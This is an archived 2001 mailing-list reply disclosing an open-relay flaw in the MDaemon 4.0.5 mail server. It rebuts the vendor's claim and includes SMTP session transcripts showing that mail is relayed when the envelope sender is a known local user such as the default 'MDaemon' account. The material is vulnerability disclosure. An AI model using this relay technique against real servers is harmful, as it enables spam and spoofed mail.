Re: Relaying in MDaemon

• Next message: mdaemonat_private: "Relay Test"
• Previous message: Joe Glass: "Re: Arkeia Possible remote root & information leakage"
• In reply to: Arvel Hathcock: "Relaying in MDaemon"
• Next in thread: JNJ: "RE: Relaying in MDaemon ((UPDATED ALEPH))"
• Reply: JNJ: "RE: Relaying in MDaemon ((UPDATED ALEPH))"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Fri, Aug 17, 2001 at 10:49:04AM -0500,
Arvel Hathcock <arvelat_private> is thought to have said:

> > It seems like that Mdaemon SMTP server can be used for
> > unauthorized relaying. Mail can be relayed when sent
> > "FROM or TO known user", it means that mail sent "from"
> > the account of one of served domains always can be relayed.
> > There is no problem to specify any "from" user, for
> > example, system account "mdaemon".
> 
> Please read the manual.  There are ways of verifying addresses.  Also, the
> default installation does not allow mail relaying.  You have enabled it
> yourself.  There is a switch setting that prevents this sort of thing and it
> is set by default.

Perhaps you should go download your product from your website and try this
yourself rather than just claiming the original poster didn't read the
documentation. I just downloaded a trial version of 4.0.5 and it relays
out of the box. 

If the envelope from you provide matches a valid user (and MDaemon is the
default installed server user) at the local domain then you can relay.

And here I had been wondering why I was getting so much spam through
MDaemon servers that the various open relay blacklists were claiming were
secure. Slightly edited examples follow.

Tabor


A random invalid user fails:

220 example.com ESMTP MDaemon 4.0.5 UNREGISTERED; Fri, 17 Aug 2001 18:11:35 -0400
ehlo blah
250-example.com Hello blah, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
mail from:<blahat_private> 
250 <blahat_private>, Sender ok
rcpt to:<twellsat_private>
550 <twellsat_private>, Recipient unknown
quit
221 See ya in cyberspace

A known valid user succeeds:

220 example.com ESMTP MDaemon 4.0.5 UNREGISTERED; Fri, 17 Aug 2001 18:11:52 -0400
ehlo blah
250-example.com Hello blah, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
mail from:<MDaemonat_private>
250 <MDaemonat_private>, Sender ok
rcpt to:<twellsat_private>
250 <twellsat_private>, Recipient ok
data
354 Enter mail, end with <CRLF>.<CRLF>
From: mdaemonat_private
To: twellsat_private
Subject: Relay Test

Blah
.
250 Ok, message saved
quit
221 See ya in cyberspace

And the relayed message it sends:

• Next message: mdaemonat_private: "Relay Test"
• Previous message: Joe Glass: "Re: Arkeia Possible remote root & information leakage"
• In reply to: Arvel Hathcock: "Relaying in MDaemon"
• Next in thread: JNJ: "RE: Relaying in MDaemon ((UPDATED ALEPH))"
• Reply: JNJ: "RE: Relaying in MDaemon ((UPDATED ALEPH))"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Aug 17 2001 - 16:59:42 PDT